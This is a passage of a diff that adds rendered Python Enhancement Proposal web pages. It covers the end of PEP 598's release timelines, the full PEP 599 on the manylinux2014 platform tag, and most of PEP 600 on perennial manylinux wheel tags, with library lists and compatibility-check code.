  • 2020-06: 3.9.0rc1
  • +
  • … additional release candidates as determined by the release manager
  • +
  • 2020-07: 3.9.0 (BFR)
  • +
  • 2020-10: 3.9.1 (IFR)
  • +
  • 2021-01: 3.9.2 (IFR)
  • +
  • 2021-04: 3.9.3 (IFR)
  • +
  • 2021-07: 3.9.4 (IFR)
  • +
  • 2021-10: 3.9.5
  • +
  • 2022-01: 3.9.6
  • +
  • 2022-04: 3.9.7
  • +
  • 2022-07: 3.9.8
  • +
  • 2022-10: 3.9.9 (final regular maintenance release)
  • +
  • … additional security fix only releases as needed
  • +
  • 2025-10: 3.9.x branch closed
  • +
+

This approach would mean there were still always two or three active branches, +it’s just that proportionally more time would be spent with a branch in the +“feature releases” phase, as compared to the “pre-alpha”, “pre-beta”, and +“pre-release” phases:

+
    +
  • 2019-04 -> 2019-10: 3.9.0 pre-alpha, 3.8.0 pre-release, 3.7.x maintenance
  • +
  • 2019-10 -> 2020-03: 3.9.0 pre-beta, 3.8.x maintenance
  • +
  • 2020-03 -> 2020-07: 3.10.0 pre-alpha, 3.9.0 pre-release, 3.8.x maintenance
  • +
  • 2020-07 -> 2021-10: 3.10.0 pre-alpha, 3.9.x feature releases, 3.8.x maintenance
  • +
  • 2021-10 -> 2022-03: 3.10.0 pre-beta, 3.9.x maintenance
  • +
  • 2022-03 -> 2022-07: 3.11.0 pre-alpha, 3.10.0 pre-release, 3.9.x maintenance
  • +
  • 2022-07 -> 2023-10: 3.11.0 pre-alpha, 3.10.x feature releases, 3.9.x maintenance
  • +
  • 2023-10 -> 2024-03: 3.11.0 pre-beta, 3.10.x maintenance
  • +
  • 2024-03 -> 2024-07: 3.12.0 pre-alpha, 3.11.0 pre-release, 3.10.x maintenance
  • +
  • … etc
  • +
+
+
+

Duration of the unreleased pre-alpha period

+

In the baseline proposal in this PEP, the proposed timelines still include +periods where we go for 18 months without making a release from the main git +branch (e.g. 3.9.0b1 would branch off in 2020-05, and 3.10.0a1 wouldn’t be +published until 2021-11). They just allow for a wider variety of changes to +be backported to the most recent maintenance branch for 12 of those months.

+

The variant of the proposal that moves the beta branch point earlier in the +release series lifecycle would increase that period of no direct releases to +21 months - the only period where releases were made directly from the main +branch would be during the relatively short window between the last incremental +feature release of the previous release series, and the beta branch point a +few months later.

+

While alternating the annual cadence between “big foundational enhancements” +and “targeted low risk API usability improvements” is a deliberate feature of +this proposal, it still seems strange to wait that long for feedback in the +event that changes are made shortly after the previous release series is +branched.

+

An alternative way of handling this would be to start publishing alpha releases +for the next baseline feature release during the feature addition period (similar +to the way that PEP 596 proposes to starting publishing Python 3.9.0 alpha +releases during the Python 3.8.0 release candidate period).

+

However, rather than setting specific timelines for that at a policy level, +it may make sense to leave that decision to individual release managers, based +on the specific changes that are being proposed for the release they’re +managing.

+
+
+

Why not switch directly to full semantic versioning?

+

If this were a versioning design document for a new language, it would use +semantic versioning: the policies described above for baseline feature releases +would be applied to X.0.0 releases, the policies for incremental feature +releases would be applied to X.Y.0 releases, and the policies for maintenance +releases would be applied to X.Y.Z releases.

+

The problem for Python specifically is that all the policies and properties for +parallel installation support and ABI compatibility definitions are currently +associated with the first two fields of the version number, and it has been +that way for the better part of thirty years.

+

As a result, it makes sense to split out the policy question of introducing +incremental feature releases in the first place from the technical question of +making the version numbering scheme better match the semantics of the different +release types.

+

If the proposal in this PEP were to be accepted by the Steering Council for +Python 3.9, then a better time to tackle that technical question would be for +the subsequent October 2022 baseline feature release, as there are already inherent +compatibility risks associated with the choice of either “Python 4.0” (erroneous +checks for the major version being exactly 3 rather than 3 or greater), or +“Python 3.10” (code incorrectly assuming that the minor version will always +contain exactly one decimal digit) [1].

+

While the text of this PEP assumes that the release published in 2022 will be +3.10 (as the PEP author personally considers that the more reasonable and most +likely choice), there are complex pros and cons on both sides of that decision, +and this PEP does arguably add a potential pro in favour of choosing the +“Python 4.0” option (with the caveat that we would also need to amend the +affected installation layout and compatibility markers to only consider the +major version number, rather than both the major and minor version).

+

If such a version numbering change were to be proposed and accepted, then the +example 3.10.x timeline given above would instead become the following 4.x +series timeline:

+
    +
  • 2021-11: 4.0.0a1
  • +
  • … additional alpha releases as determined by the release manager
  • +
  • 2022-05: 4.0.0b1
  • +
  • … additional beta releases as determined by the release manager
  • +
  • 2022-08: 4.0.0bX (final beta release that locks ABI compatibility)
  • +
  • 2022-09: 4.0.0rc1
  • +
  • … additional release candidates as determined by the release manager
  • +
  • 2022-10: 4.0.0 (BFR)
  • +
  • 2023-01: 4.1.0 (IFR)
  • +
  • 2023-04: 4.2.0 (IFR)
  • +
  • 2023-07: 4.3.0 (IFR)
  • +
  • 2023-10: 4.4.0 (IFR)
  • +
  • 2024-01: 4.4.1
  • +
  • 2024-04: 4.4.2
  • +
  • 2024-07: 4.4.3
  • +
  • 2024-10: 4.4.4 (final regular maintenance release)
  • +
  • … additional security fix only releases as needed
  • +
  • 2027-10: 4.x branch closed
  • +
+

And the 5 year schedule forecast would look like:

+
    +
  • 2019-04 -> 2019-10: 3.9.0 pre-alpha, 3.8.0 pre-release, 3.7.x maintenance
  • +
  • 2019-10 -> 2020-05: 3.9.0 pre-beta, 3.8.x maintenance
  • +
  • 2020-05 -> 2020-10: 4.0.0 pre-alpha, 3.9.0 pre-release, 3.8.x maintenance
  • +
  • 2020-10 -> 2021-10: 4.0.0 pre-alpha, 3.9.x feature releases, 3.8.x maintenance
  • +
  • 2021-10 -> 2022-05: 4.0.0 pre-beta, 3.9.x maintenance
  • +
  • 2022-05 -> 2022-10: 5.0.0 pre-alpha, 4.0.0 pre-release, 3.9.x maintenance
  • +
  • 2022-10 -> 2023-10: 5.0.0 pre-alpha, 4.x.0 feature releases, 3.9.x maintenance
  • +
  • 2023-10 -> 2024-05: 5.0.0 pre-beta, 4.x.y maintenance
  • +
  • 2024-05 -> 2024-10: 6.0.0 pre-alpha, 5.0.0 pre-release, 4.x.y maintenance
  • +
  • … etc
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0598.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0599/index.html b/pep-0599/index.html new file mode 100644 index 00000000000..10eb0b722af --- /dev/null +++ b/pep-0599/index.html @@ -0,0 +1,487 @@ + + + + + + + + PEP 599 – The manylinux2014 Platform Tag | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 599 – The manylinux2014 Platform Tag

+
+
Author:
+
Dustin Ingram <di at python.org>
+
Sponsor:
+
Paul Moore <p.f.moore at gmail.com>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Superseded
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
29-Apr-2019
+
Post-History:
+
29-Apr-2019
+
Superseded-By:
+
600
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the creation of a manylinux2014 platform tag to +succeed the manylinux2010 tag introduced by PEP 513. It also +proposes that PyPI and pip both be updated to support uploading, +downloading, and installing manylinux2014 distributions on +compatible platforms.

+
+
+

Rationale

+

CentOS 6 is now the oldest supported CentOS release, and will receive +maintenance updates through November 30th, 2020, [1] at which point +it will reach end-of-life, and no further updates such as security +patches will be made available. All wheels built under the +manylinux2010 images will remain at obsolete versions after that +point.

+

Therefore, we propose the continuation of the existing manylinux +standard, and that a new PEP 425-style platform tag called +manylinux2014 be derived from CentOS 7 and that the manylinux +toolchain, PyPI, and pip be updated to support it.

+

Similar to how PEP 571 and PEP 513 drew allowed shared +libraries and their symbol versions from CentOS 5.11 and CentOS 6, +respectively, a manylinux2014 platform tag will draw its libraries +and symbol versions from CentOS 7, which will reach end-of-life on +June 30th, 2024. [1]

+

The manylinuxYYYY pattern has a number of advantages that motivate +continuing with the current status quo:

+
    +
  • Well-defined Docker images with clearly specified compatible +libraries;
  • +
  • No need to survey for compatibility issues across multiple releases;
  • +
  • A single build image and auditwheel profile per architecture.
  • +
+

There are also some disadvantages:

+
    +
  • Requires drafting a new PEP for every new standard;
  • +
  • Requires adding the new platform tag to installers (e.g., pip);
  • +
  • Installers are unable to install a platform tag which predates a +given release.
  • +
+

There are also challenges which would exist for any proposal, +including the time and effort it takes to define, prepare and release +the Docker images and corresponding auditwheel profiles. These +challenges were experienced in the long rollout period for +manylinux2010, which took approximately 1 year from PEP acceptance +to compatible build environment published. [3]

+

However, if this PEP can be an indicator, the process is now +well-defined and easily repeatable, which should increase the timeline +for rollout of a newer, updated platform tag.

+
+
+

The manylinux2014 policy

+

The following criteria determine a linux wheel’s eligibility for +the manylinux2014 tag:

+
    +
  1. The wheel may only contain binary executables and shared objects +compiled for one of the following architectures supported by CentOS +7, or a CentOS 7 compatible base image (such as ubi7): [4]
    x86_64
    +i686
    +aarch64
    +armv7l
    +ppc64
    +ppc64le
    +s390x
    +
    +
    +

    This list adds support for ARMv7 (armv7l), ARMv8 (aarch64) and PowerPC +(ppc64, ppc64le) architectures supported by the CentOS Alternative +Architecture Special Interest Group, as well as the IBM Z (s390x) +architecture. [5]

    +
  2. +
  3. The wheel’s binary executables or shared objects may not link +against externally-provided libraries except those in the following +list:
    libgcc_s.so.1
    +libstdc++.so.6
    +libm.so.6
    +libdl.so.2
    +librt.so.1
    +libc.so.6
    +libnsl.so.1
    +libutil.so.1
    +libpthread.so.0
    +libresolv.so.2
    +libX11.so.6
    +libXext.so.6
    +libXrender.so.1
    +libICE.so.6
    +libSM.so.6
    +libGL.so.1
    +libgobject-2.0.so.0
    +libgthread-2.0.so.0
    +libglib-2.0.so.0
    +
    +
    +

    This list is identical to the externally-provided libraries +originally allowed for manylinux2010, with one exception: +libcrypt.so.1 was removed due to being deprecated in Fedora 30. +libpythonX.Y remains ineligible for inclusion for the same +reasons outlined in PEP 513.

    +

    On Debian-based systems, these libraries are provided by the +packages:

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    PackageLibraries
    libc6libdl.so.2, libresolv.so.2, librt.so.1, libc.so.6, +libpthread.so.0, libm.so.6, libutil.so.1, libnsl.so.1
    libgcc1libgcc_s.so.1
    libgl1libGL.so.1
    libglib2.0-0libgobject-2.0.so.0, libgthread-2.0.so.0, libglib-2.0.so.0
    libice6libICE.so.6
    libsm6libSM.so.6
    libstdc++6libstdc++.so.6
    libx11-6libX11.so.6
    libxext6libXext.so.6
    libxrender1libXrender.so.1
    +

    On RPM-based systems, they are provided by these packages:

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    PackageLibraries
    glib2libglib-2.0.so.0, libgthread-2.0.so.0, libgobject-2.0.so.0
    glibclibresolv.so.2, libutil.so.1, libnsl.so.1, librt.so.1, +libpthread.so.0, libdl.so.2, libm.so.6, libc.so.6
    libICElibICE.so.6
    libX11libX11.so.6
    libXext:libXext.so.6
    libXrenderlibXrender.so.1
    libgcc:libgcc_s.so.1
    libstdc++libstdc++.so.6
    mesalibGL.so.1
    +
  4. +
  5. If the wheel contains binary executables or shared objects linked +against any allowed libraries that also export versioned symbols, +they may only depend on the following maximum versions:
    GLIBC_2.17
    +CXXABI_1.3.7, CXXABI_TM_1 is also allowed
    +GLIBCXX_3.4.19
    +GCC_4.8.0
    +
    +
    +

    As an example, manylinux2014 wheels may include binary +artifacts that require glibc symbols at version GLIBC_2.12, +because this an earlier version than the maximum of GLIBC_2.17.

    +
  6. +
  7. If a wheel is built for any version of CPython 2 or CPython +versions 3.0 up to and including 3.2, it must include a CPython +ABI tag indicating its Unicode ABI. A manylinux2014 wheel +built against Python 2, then, must include either the cpy27mu +tag indicating it was built against an interpreter with the UCS-4 +ABI or the cpy27m tag indicating an interpreter with the UCS-2 +ABI. (PEP 3149 [7])
  8. +
  9. A wheel must not require the PyFPE_jbuf symbol. This is +achieved by building it against a Python compiled without the +--with-fpectl configure flag.
  10. +
+
+
+

Compilation of Compliant Wheels

+

Like manylinux1, the auditwheel tool adds manylinux2014 +platform tags to linux wheels built by pip wheel or +bdist_wheel in a manylinux2014 Docker container.

+
+

Docker Images

+

A manylinux2014 Docker image based on CentOS 7 x86_64 should be +provided for building binary linux wheels that can reliably be +converted to manylinux2014 wheels. This image will come with a +full compiler suite installed (gcc, g++, and gfortran +4.8.5) as well as the latest releases of Python and pip.

+
+
+

Auditwheel

+

The auditwheel tool will also be updated to produce +manylinux2014 wheels. [8] Its behavior and purpose will be +otherwise unchanged from PEP 513.

+
+
+
+

Platform Detection for Installers

+

Platforms may define a manylinux2014_compatible boolean attribute +on the _manylinux module described in PEP 513. A platform is +considered incompatible with manylinux2014 if the attribute is +False.

+

If the _manylinux module is not found, or it does not have the +attribute manylinux2014_compatible, tools may fall back to +checking for glibc. If the platform has glibc 2.17 or newer, it is +assumed to be compatible unless the _manylinux module says +otherwise.

+

Specifically, the algorithm we propose is:

+
def is_manylinux2014_compatible():
+    # Only Linux, and only supported architectures
+    from distutils.util import get_platform
+
+    if get_platform() not in [
+        "linux-x86_64",
+        "linux-i686",
+        "linux-aarch64",
+        "linux-armv7l",
+        "linux-ppc64",
+        "linux-ppc64le",
+        "linux-s390x",
+    ]:
+        return False
+
+    # Check for presence of _manylinux module
+    try:
+        import _manylinux
+
+        return bool(_manylinux.manylinux2014_compatible)
+    except (ImportError, AttributeError):
+        # Fall through to heuristic check below
+        pass
+
+    # Check glibc version. CentOS 7 uses glibc 2.17.
+    # PEP 513 contains an implementation of this function.
+    return have_compatible_glibc(2, 17)
+
+
+
+
+

Backwards compatibility with manylinux2010 wheels

+

As explained in PEP 513, the specified symbol versions for +manylinux1 allowed libraries constitute an upper bound. The +same is true for the symbol versions defined for manylinux2014 in +this PEP. As a result, manylinux1 and manylinux2010 wheels +are considered manylinux2014 wheels. A pip that recognizes +the manylinux2014 platform tag will thus install manylinux2010 +wheels for manylinux2014 platforms – even when explicitly set – +when no manylinux2014 wheels are available.

+
+
+

PyPI Support

+

PyPI should permit wheels containing the manylinux2014 platform +tag to be uploaded in the same way that it permits manylinux2010.

+

If technically feasible, PyPI should attempt to verify the +compatibility of manylinux2014 wheels, but that capability is not +a requirement for adoption of this PEP.

+

Package authors should not upload non-compliant manylinux2014 +wheels to PyPI, and should be aware that PyPI may begin blocking +non-compliant wheels from being uploaded.

+
+
+

References

+ +
+
+

Acceptance

+

PEP 599 was accepted by Paul Moore on July 31, 2019.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0599.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0600/index.html b/pep-0600/index.html new file mode 100644 index 00000000000..1294f089390 --- /dev/null +++ b/pep-0600/index.html @@ -0,0 +1,598 @@ + + + + + + + + PEP 600 – Future ‘manylinux’ Platform Tags for Portable Linux Built Distributions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 600 – Future ‘manylinux’ Platform Tags for Portable Linux Built Distributions

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>, +Thomas Kluyver <thomas at kluyver.me.uk>
+
Sponsor:
+
Paul Moore <p.f.moore at gmail.com>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
03-May-2019
+
Post-History:
+
03-May-2019
+
Replaces:
+
513, 571, 599
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a scheme for new ‘manylinux’ wheel tags to be +defined without requiring a PEP for every specific tag, similar to how +Windows and macOS tags already work. This will allow package +maintainers to take advantage of new tags more quickly, while making +better use of limited volunteer time.

+

Non-goals include: handling non-glibc-based platforms; integrating +with external package managers or handling external dependencies such +as CUDA; making manylinux tags more sophisticated than their +Windows/macOS equivalents; doing anything besides taking our existing +tried-and-tested approach and streamlining it. These are important +issues and other PEPs may address them in the future, but for this PEP +they’re out of scope.

+
+
+

Rationale

+

Python users appreciate it when PyPI has pre-compiled packages for +their platform, because it makes installation fast and simple. But +distributing pre-compiled binaries on Linux is challenging because of +the diversity of Linux-based platforms. For example, Debian, Android, +and Alpine all use the Linux kernel, but with radically different +userspace libraries, which makes it difficult or impossible to create +a single wheel that works on all three. This complexity has caused +many previous discussions of Linux wheels to stall out.

+

The “manylinux” project succeeded by adopting a strategy of ruthless +pragmatism. We chose a large but tractable set of Linux platforms – +specifically, mainstream glibc-based distributions like Debian, +OpenSuSE, Ubuntu, RHEL, etc. – and then we did whatever it takes to +make wheels that work across all these platforms.

+

This approach requires many compromises. Manylinux wheels can only +rely on external libraries that maintain a consistent ABI and are +universally available across all these distributions, which in +practice restricts them to a small set of core libraries like glibc +and a few others. Wheels have to be built on carefully-chosen +platforms of the oldest possible vintage, using a Python that is +itself built in a carefully-chosen configuration. Other shared library +dependencies have to be bundled into the wheel, which requires a +complex process to avoid collisions between unrelated wheels. And +finally, the details of these requirements change over time, as new +distro versions are released, and old ones fall out of use.

+

It turns out that these requirements are not too onerous: they’re +essentially equivalent to what you have to do to ship Windows or macOS +wheels, and the manylinux approach has achieved substantial uptake +among both package maintainers and end-users. But any manylinux PEP +needs some way to address these complexities.

+

In previous manylinux PEPs (PEP 513, PEP 571, PEP 599), we’ve +done this by attempting to write down in the PEP the exact set of +libraries, symbol versions, Python configuration, etc. that we +believed would lead to wheels that work on all mainstream glibc-based +Linux systems. But this created several problems:

+

First, PEPs are generally supposed to be normative references: if +software doesn’t match the PEP, then we fix the software. But in this +case, the PEPs are attempting to describe Linux distributions, which +are a moving target, and do not consider our PEPs to constrain their +behavior. This means that we’ve been taking on an unbounded commitment +to keep updating every manylinux PEP whenever the Linux distro +landscape changes. This is a substantial commitment for unfunded +volunteers to take on, and it’s not clear that this work produces +value for our users.

+

And second, every time we move manylinux forward to a newer range of +supported platforms, or add support for a new architecture, we have to +go through a fairly elaborate process: writing a new PEP, updating the +PyPI and pip codebases to recognize the new tag, waiting for the new +pip to percolate to users, etc. None of this happens on Windows/macOS; +it’s only a tax on Linux maintainers. This slows deployment of new +manylinux versions, and consumes part of our community’s limited PEP +review bandwidth, thus slowing progress of the Python packaging +ecosystem as a whole. This is especially problematic for less-popular +architectures, who have less volunteer resources to overcome these +barriers.

+

How can we fix it?

+

A manylinux PEP has to address three main audiences:

+
    +
  • Package installers, like pip, need to be able to determine which +wheel tags are compatible with the system they find themselves +running on. This requires some automated process to introspect the +system and match it up with wheel tags.
  • +
  • Package indexes, like PyPI, need to be able to validate which +wheel tags are valid. Generally, this just requires something like a +list of valid tags, or regex they match, with no need to know +anything about the actual semantics for individual tags. (But see +the discussion of upload verification below.)
  • +
  • Package maintainers need to be able to build wheels that meet +the requirements for a given wheel tag.
  • +
+

Here’s the key insight behind this new PEP: it’s crucial that +different package installers and package indexes all agree on +which manylinux tags are valid and which systems they install on, so +we need a PEP to specify these – but, these are straightforward, and +don’t really change between manylinux versions. The complicated part +that keeps changing is the process of actually building the wheels +– but, if there are multiple competing build environments, it doesn’t +matter whether they use exactly the same rules as each other, as long +as they all produce wheels that work on end-user systems. Therefore, +we don’t need an interoperability standard for building wheels, so we +don’t need to write the details into a PEP.

+

To further convince ourselves that this approach will work, let’s look +again at how we handle wheels on Windows and macOS: the PEPs describe +which tags are valid, and which systems they’re supposed to work on, +but not how to actually build wheels for those platforms. And in +practice, if you want to distribute Windows or macOS wheels, you might +have to jump through some complicated and poorly documented hoops in +order to bundle dependencies, target the right range of OS versions, +etc. But the system works, and the way to improve it is to write +better docs and build better tooling; no-one thinks that the way to +make Windows wheels work better is to publish a PEP describing +which symbols we think Microsoft should be including in their +libraries and how their linker ought to work. This PEP extends that +philosophy to manylinux as well.

+
+
+

Specification

+
+

Core definition

+

Tags using the new scheme will look like:

+
manylinux_2_17_x86_64
+
+
+

Or more generally:

+
manylinux_${GLIBCMAJOR}_${GLIBCMINOR}_${ARCH}
+
+
+

This tag is a promise: the wheel’s creator promises that the wheel +will work on any mainstream Linux distro that uses glibc version +${GLIBCMAJOR}.${GLIBCMINOR} or later, and where the ${ARCH} +matches the return value from distutils.util.get_platform(). (For +more detail about architecture tags, see PEP 425.)

+

If a user installs this wheel into an environment that matches these +requirements and it doesn’t work, then that wheel does not comply with +this specification. This should be considered a bug in the wheel, and +it’s the wheel creator’s responsibility to look for a fix (possibly +with the help of the broader community).

+

The word “mainstream” is intentionally somewhat vague, and should be +interpreted expansively. The goal is to rule out weird homebrew Linux +systems; generally any distro you’ve actually heard of should be +considered “mainstream”. We also provide a way for maintainers of +“weird” distros to manually override this check, though based on +experience with previous manylinux PEPs, we don’t expect this feature +to see much use.

+

And finally, compliant wheels are required to “play well with others”, +i.e., installing a manylinux wheel must not cause other unrelated +packages to break.

+

Any method of producing wheels which meets these criteria is +acceptable. However, in practice we expect that the auditwheel project +will maintain an up-to-date set of tools and build images for +producing manylinux wheels, as well as documentation about how they +work and how to use them, and that most maintainers will want to use +those. For the latest information on building manylinux wheels, +including recommendations about which build images to use, see +https://packaging.python.org.

+

Since these requirements are fairly high-level, here are some examples +of how they play out in specific situations:

+

Example: if a wheel is tagged as manylinux_2_17_x86_64, but it +uses symbols that were only added in glibc 2.18, then that wheel won’t +work on systems with glibc 2.17. Therefore, we can conclude that this +wheel is in violation of this specification.

+

Example: Until ~2017, all major Linux distros included +libncursesw.so.5 as part of their default install. Until that +date, a wheel that linked to libncursesw.so.5 was compliant with +this specification. Then, distros started switching to ncurses 6, +which has a different name and incompatible ABI, and stopped +installing libncursesw.so.5 by default. So after that date, a +wheel that links to libncursesw.so.5 was no longer compliant with +this specification.

+

Example: The Linux ELF linker places all shared library SONAMEs into a +single process-global namespace. If independent wheels used the same +SONAME for their bundled libraries, they might end up colliding and +using the wrong library version, which would violate the “play well +with others” rule. Therefore, this specification requires that wheels +use globally-unique names for all bundled libraries. (Auditwheel +currently accomplishes this by renaming all bundled libraries to +include a globally-unique hash.)

+

Example: we’ve observed certain wheels using C++ in ways that +interfere with other packages via an unclear +mechanism. This is also a violation of the “play well with others” +rule, so those wheels aren’t compliant with this specification.

+

Example: The imaginary architecture LEG v7 has both big-endian and +little-endian variants. Big-endian binaries require a big-endian +system, and little-endian binaries require a little-endian system. But +unfortunately, it’s discovered that due to a bug in PEP 425, both +variants use the same architecture tag, legv7. This makes it +impossible to create a compliant manylinux_2_17_legv7 wheel: no +matter what we do, it will crash on some user’s systems. So, we write +a new PEP defining architecture tags legv7le and legv7be; now +we can ship manylinux LEG v7 wheels.

+

Example: There’s also a LEG v8. It also has big-endian and +little-endian variants. But fortunately, it turns out that PEP 425 +already does the right thing LEG v8, so LEG v8 enthusiasts can start +shipping manylinux_2_17_legv8le and manylinux_2_17_legv8be +wheels immediately once this PEP is implemented, even though the +authors of this PEP don’t know anything at all about LEG v8.

+
+
+

Legacy manylinux tags

+

The existing manylinux tags are redefined as aliases for new-style +tags:

+
    +
  • manylinux1_x86_64 is now an alias for manylinux_2_5_x86_64
  • +
  • manylinux1_i686 is now an alias for manylinux_2_5_i686
  • +
  • manylinux2010_x86_64 is now an alias for manylinux_2_12_x86_64
  • +
  • manylinux2010_i686 is now an alias for manylinux_2_12_i686
  • +
  • manylinux2014_x86_64 is now an alias for manylinux_2_17_x86_64
  • +
  • manylinux2014_i686 is now an alias for manylinux_2_17_i686
  • +
  • manylinux2014_aarch64 is now an alias for manylinux_2_17_aarch64
  • +
  • manylinux2014_armv7l is now an alias for manylinux_2_17_armv7l
  • +
  • manylinux2014_ppc64 is now an alias for manylinux_2_17_ppc64
  • +
  • manylinux2014_ppc64le is now an alias for manylinux_2_17_ppc64le
  • +
  • manylinux2014_s390x is now an alias for manylinux_2_17_s390x
  • +
+

This redefinition is largely a no-op, but does affect a few things:

+
    +
  • Previously, we had an open-ended and growing commitment to keep +updating every manylinux PEP whenever a new Linux distro was +released, for the rest of time. By making this PEP normative for the +older tags, that obligation goes away. When this PEP is accepted, +the previous manylinux PEPs will receive a final update noting that +they are no longer maintained and referring to this PEP.
  • +
  • The “play well with others” rule was always intended, but previous +PEPs didn’t state it explicitly; now it’s explicit.
  • +
  • Previous PEPs assumed that glibc 3.x might be incompatible with +glibc 2.x, so we checked for compatibility between a system and a +tag using logic like:
    sys_major == tag_major and sys_minor >= tag_minor
    +
    +
    +

    Recently the glibc maintainers advised us that we +should assume that glibc will maintain backwards-compatibility +indefinitely, even if they bump the major version number. So the new +check for compatibility is:

    +
    (sys_major, sys_minor) >= (tag_major, tag_minor)
    +
    +
    +
  • +
+
+
+

Package installers

+

Generally, package installers should install manylinux wheels on +systems that have an appropriate glibc and architecture, and not +otherwise. If there are multiple compatible manylinux wheels +available, then the wheel with the highest glibc version should be +preferred, in order to take advantage of newer compilers and glibc +features.

+

In addition, we follow previous specifications, and allow for Python +distributors to manually override this check by adding a +_manylinux module to their standard library. If this package is +importable, and if it defines a function called +manylinux_compatible, then package installers should call this +function, passing in the major version, minor version, and +architecture from the manylinux tag, and it will either return a +boolean saying whether wheels with the given tag should be considered +compatible with the current system, or else None to indicate that +the default logic should be used.

+

For compatibility with previous specifications, if the tag is +manylinux1 or manylinux_2_5 exactly, then we also check the +module for a boolean attribute manylinux1_compatible, if the +tag version is manylinux2010 or manylinux_2_12 exactly, then +we also check the module for a boolean attribute +manylinux2010_compatible, and if the tag version is +manylinux2014 or manylinux_2_17 exactly, then we also check +the module for a boolean attribute manylinux2014_compatible. If +both the new and old attributes are defined, then +manylinux_compatible takes precedence.

+

Here’s some example code. You don’t have to actually use this code, +but you can use it for reference if you have questions about the exact +semantics:

+
LEGACY_ALIASES = {
+    "manylinux1_x86_64": "manylinux_2_5_x86_64",
+    "manylinux1_i686": "manylinux_2_5_i686",
+    "manylinux2010_x86_64": "manylinux_2_12_x86_64",
+    "manylinux2010_i686": "manylinux_2_12_i686",
+    "manylinux2014_x86_64": "manylinux_2_17_x86_64",
+    "manylinux2014_i686": "manylinux_2_17_i686",
+    "manylinux2014_aarch64": "manylinux_2_17_aarch64",
+    "manylinux2014_armv7l": "manylinux_2_17_armv7l",
+    "manylinux2014_ppc64": "manylinux_2_17_ppc64",
+    "manylinux2014_ppc64le": "manylinux_2_17_ppc64le",
+    "manylinux2014_s390x": "manylinux_2_17_s390x",
+}
+
+def manylinux_tag_is_compatible_with_this_system(tag):
+    # Normalize and parse the tag
+    tag = LEGACY_ALIASES.get(tag, tag)
+    m = re.match("manylinux_([0-9]+)_([0-9]+)_(.*)", tag)
+    if not m:
+        return False
+    tag_major_str, tag_minor_str, tag_arch = m.groups()
+    tag_major = int(tag_major_str)
+    tag_minor = int(tag_minor_str)
+
+    if not system_uses_glibc():
+        return False
+    sys_major, sys_minor = get_system_glibc_version()
+    if (sys_major, sys_minor) < (tag_major, tag_minor):
+        return False
+    sys_arch = get_system_arch()
+    if sys_arch != tag_arch:
+        return False
+
+    # Check for manual override
+    try:
+        import _manylinux
+    except ImportError:
+        pass
+    else:
+        if hasattr(_manylinux, "manylinux_compatible"):
+            result = _manylinux.manylinux_compatible(
+                tag_major, tag_minor, tag_arch,
+            )
+            if result is not None:
+                return bool(result)
+        else:
+            if (tag_major, tag_minor) == (2, 5):
+                if hasattr(_manylinux, "manylinux1_compatible"):
+                    return bool(_manylinux.manylinux1_compatible)
+            if (tag_major, tag_minor) == (2, 12):
+                if hasattr(_manylinux, "manylinux2010_compatible"):
+                    return bool(_manylinux.manylinux2010_compatible)
+
+    return True
+
+
+
+
+

Package indexes

+

The exact set of wheel tags accepted by PyPI, or any package index, is +a policy question, and up to the maintainers of that index. But, we +recommend that package indexes accept any wheels whose platform tag +matches the following regexes:

+
    +
  • manylinux1_(x86_64|i686)
  • +
  • manylinux2010_(x86_64|i686)
  • +
  • manylinux2014_(x86_64|i686|aarch64|armv7l|ppc64|ppc64le|s390x)
  • +
  • manylinux_[0-9]+_[0-9]+_(.*)
  • +
+

Package indexes may impose additional requirements; for example, they +might audit uploaded wheels and reject those that contain known +problems, such as a manylinux_2_17 wheel that references symbols +from later glibc versions, or dependencies on external libraries that +are known not to exist on all systems. Or a package index might decide +to be conservative and reject wheels tagged manylinux_2_999, on +the grounds that no-one knows what the Linux distro landscape will +look like when glibc 2.999 is released. We leave the details of any +such checks to the discretion of the package index maintainers.

+
+
+
+

Rejected alternatives

+

Continuing the manylinux20XX series: As discussed above, this +leads to much more effort-intensive, slower, and more complex rollouts +of new versions. And while there are two places where it seems at +first to have some compensating benefits, if you look more closely +this turns out not to be the case.

+

First, this forces us to produce human-readable descriptions of how +Linux distros work, in the text of the PEP. But this is less valuable +than it might seem at first, and can actually be handled better by the +new “perennial” approach anyway.

+

If you’re trying to build wheels, the main thing you need is a +tutorial on how to use the build images and tooling around them. If +you’re trying to add support for a new build profile or create a +competitor to auditwheel, then your best resources will be the +auditwheel source code and issue tracker, which are always going to be +more detailed, precise, and reliable than a summary spec written in +English and without tests. Documentation like the old manylinux20XX +PEPs does add value! But in both cases, it’s primarily as a secondary +reference to provide overview and context.

+

